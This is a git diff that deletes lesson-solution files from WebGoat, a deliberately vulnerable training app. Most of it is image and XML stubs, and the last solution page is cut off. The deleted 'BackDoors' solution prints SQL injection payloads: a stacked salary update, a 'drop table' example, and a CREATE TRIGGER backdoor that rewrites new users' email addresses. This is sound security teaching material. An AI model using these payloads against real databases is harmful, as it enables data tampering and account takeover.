diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml b/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml deleted file mode 100644 index 5f46ccf32..000000000 --- a/src/main/webapp/lesson_solutions/WSDLScanning_files/filelist.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png deleted file mode 100644 index 3268c9b0a..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png deleted file mode 100644 index 25ea1988a..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png deleted file mode 100644 index 63f42f9de..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png b/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png deleted file mode 100644 index 9ca7703d6..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg deleted file mode 100644 index fb0e23ea9..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg deleted file mode 100644 index cb7259343..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg deleted file mode 100644 index 300095af6..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg b/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg deleted file mode 100644 index 2d00abf25..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx b/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml deleted file mode 100644 index ce42de1c0..000000000 --- a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml +++ /dev/null 
@@ -1,24 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png deleted file mode 100644 index edac8c19a..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png deleted file mode 100644 index 0306a8f1f..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png deleted file mode 100644 index 7afb889fe..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png deleted file mode 100644 index 5c6c3d9c8..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png deleted file mode 100644 index 6d110d265..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png
deleted file mode 100644
index 6831d62bf..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png
deleted file mode 100644
index c04235add..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png
deleted file mode 100644
index b0a6eceb4..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png
deleted file mode 100644
index 78a1feb74..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg
deleted file mode 100644
index a6e68a265..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg
deleted file mode 100644
index 338a42ed8..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg
deleted file mode 100644
index c1662c8f0..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg
deleted file mode 100644
index 96f7253fd..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg
deleted file mode 100644
index c856ee032..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg
deleted file mode 100644
index 1cbf8ff3a..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg
deleted file mode 100644
index d9b59af8b..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg
deleted file mode 100644
index 5d30443e1..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg
deleted file mode 100644
index dec137dce..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg
deleted file mode 100644
index 7309a0035..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg
deleted file mode 100644
index 3b442cc42..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg deleted file mode 100644 index 21ce9ef3d..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg deleted file mode 100644 index 52b78aaca..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg deleted file mode 100644 index bbc01ffc1..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg deleted file mode 100644 index 27ca4296d..000000000 Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml deleted file mode 100644 index 56559fd6d..000000000 --- a/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml +++ /dev/null @@ -1,16 +0,0 @@ - - - - - - - - - - - - - - - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png
deleted file mode 100644
index ba76d14d9..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg
deleted file mode 100644
index 24692deda..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png
deleted file mode 100644
index be045e27f..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg
deleted file mode 100644
index c6698ffba..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png
deleted file mode 100644
index 84e5ff852..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg
deleted file mode 100644
index 40dcd7832..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png deleted file mode 100644 index 94b298db1..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg deleted file mode 100644 index 9faeaaac1..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png deleted file mode 100644 index acdfd2592..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg deleted file mode 100644 index ad7400d38..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml deleted file mode 100644 index 2596e1075..000000000 --- a/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png deleted file mode 100644 index 82abbd808..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg deleted file mode 100644 index 60c86b971..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png deleted file mode 100644 index e658bb1b9..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg deleted file mode 100644 index cb476bc0d..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png deleted file mode 100644 index d1db6bcb8..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg deleted file mode 100644 index f3e91d5e9..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png deleted file mode 100644 index d3bd79b6b..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg deleted file mode 100644 index 50c57e172..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml deleted file mode 100644 index 91acaa646..000000000 --- a/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml +++ /dev/null @@ -1,22 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png
deleted file mode 100644
index b32e9194e..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png
deleted file mode 100644
index f0de7feb1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png
deleted file mode 100644
index d2589d1b8..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png
deleted file mode 100644
index d2489a851..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png
deleted file mode 100644
index c2b095cd1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png
deleted file mode 100644
index e316c46cb..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png
deleted file mode 100644
index 2c485734d..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png
deleted file mode 100644
index f59f4c79b..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg
deleted file mode 100644
index 5cde78c29..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg
deleted file mode 100644
index 50a020099..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg
deleted file mode 100644
index 3ec8d20a1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg
deleted file mode 100644
index 3181beb41..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg deleted file mode 100644 index 164e97f7d..000000000 Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg deleted file mode 100644 index 155301a55..000000000 Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg deleted file mode 100644 index 3ed684669..000000000 Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg deleted file mode 100644 index 00a8ad33b..000000000 Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml deleted file mode 100644 index 3d5d19db6..000000000 --- a/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml +++ /dev/null @@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png deleted file mode 100644 index c710b2228..000000000 Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png deleted file mode 100644 index aa3b3886c..000000000 Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png deleted file mode 100644 index c63e9830a..000000000 Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg deleted file mode 100644 index a74456833..000000000 Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg deleted file mode 100644 index 229e969db..000000000 Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg deleted file mode 100644 index 731010dab..000000000 Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html b/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html deleted file mode 100644 index ab0e18e3c..000000000 --- a/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html +++ /dev/null @@ -1,707 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: Using an -Access Control Matrix

- -

 

- -

Concept / -Topic To Teach:

- - - -

In a -role-based access control scheme, a role represents a set of access permissions -and privileges. A user can be assigned one or more roles. A role-based access -control scheme normally consists of two parts: role permission management and -role assignment. A broken role-based access control scheme might allow a user -to perform accesses that are not allowed by his/her assigned roles, or somehow -allow privilege escalation to an unauthorized role.

- -

 

- -

General -Goal(s):

- -

Each user is -a member of a role that is allowed to access only certain resources. Your goal -is to explore the access control rules that govern this site. Only the [Admin] -group should have access to the 'Account Manager' resource.

- -

 

- -

Solution:

- -

 

- -

This exercise -is straightforward. You need to find a user where you can access a resource -that you shouldn't be able to access.

- -

After a few attempts -you will learn that Larry can access resources of the role Account Manager.

- -

 

- -

- -

Figure 1 Lesson 9

- -

 

- -

- -

Figure 2 Lesson 9 Completed

- -

 

- -
-
- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/BackDoors.html b/src/main/webapp/lesson_solutions_1/BackDoors.html deleted file mode 100644 index 3a999c080..000000000 --- a/src/main/webapp/lesson_solutions_1/BackDoors.html +++ /dev/null @@ -1,841 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Create Database Back Door Attacks.

- -

 

- -

Concept / -Topic To Teach:

- -

How to Create -Database Back Door Attacks.

- -

 

- -

How the -attacks works:

- -

Databases are -used usually as a backend for web applications. Also it is used as a media of -storage. It can also be used as a place to store a malicious activity such as a -trigger. A trigger is called by the database management system upon the -execution of another database operation like insert, select, update or delete. -An attacker for example can create a trigger that would set his email address -instead of every new user's email address.

- -

 

- -

General -Goal(s):

- -

Your -goal should be to learn how you can exploit a vulnerable query to create a -trigger.
-You will not be able to actually create one in this lesson because the -underlying database engine used with WebGoat doesn't support triggers.
-Your login ID is 101.

- -

 

- -

- -

Figure 1 Database backdoor

- -

 

- -

Solution:

- -

Enter your user ID 101 to see how the application works.

- -

 

- -

- -

Figure 2 User ID is 101

- -

 

- -

As you -probably noticed, the input is not validated so very easy to do SQL Injection. -To have two SQL queries executed, you need to separate them using a sem-colon. -For example select * from employees; drop table employees will first select all -the users from employees and then drop the table employees. Not all databases -support multiple SQL statements.

- -

 

- -

Here you need -to update the salary of the employees. This requires an update query like -update employees set salary=10000.

- -

 

- -

Inject this -for the user ID: 101; update employee set salary=10000

- -

 

- -

- -

Figure 3 Update query

- -

 

- -

- -

Figure 4 Stage 1 completed

- -

 

- -

To create a -database trigger, you need to inject the following SQL: CREATE TRIGGER -myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET -email='john@hackme.com'WHERE userid = NEW.userid

- -

 

- -

- -

Figure 5 Insert trigger

- -

 

- -

- -

Figure 6 Lesson completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/BasicAuthentication.html b/src/main/webapp/lesson_solutions_1/BasicAuthentication.html
deleted file mode 100644
index 5d888cf5f..000000000
--- a/src/main/webapp/lesson_solutions_1/BasicAuthentication.html
+++ /dev/null
@@ -1,933 +0,0 @@
- - - - - - - -Basic Authentication - - - - - - - - - - - - -
- -

Lesson -Plan Title: Basic -Authentication

- -

 

- -

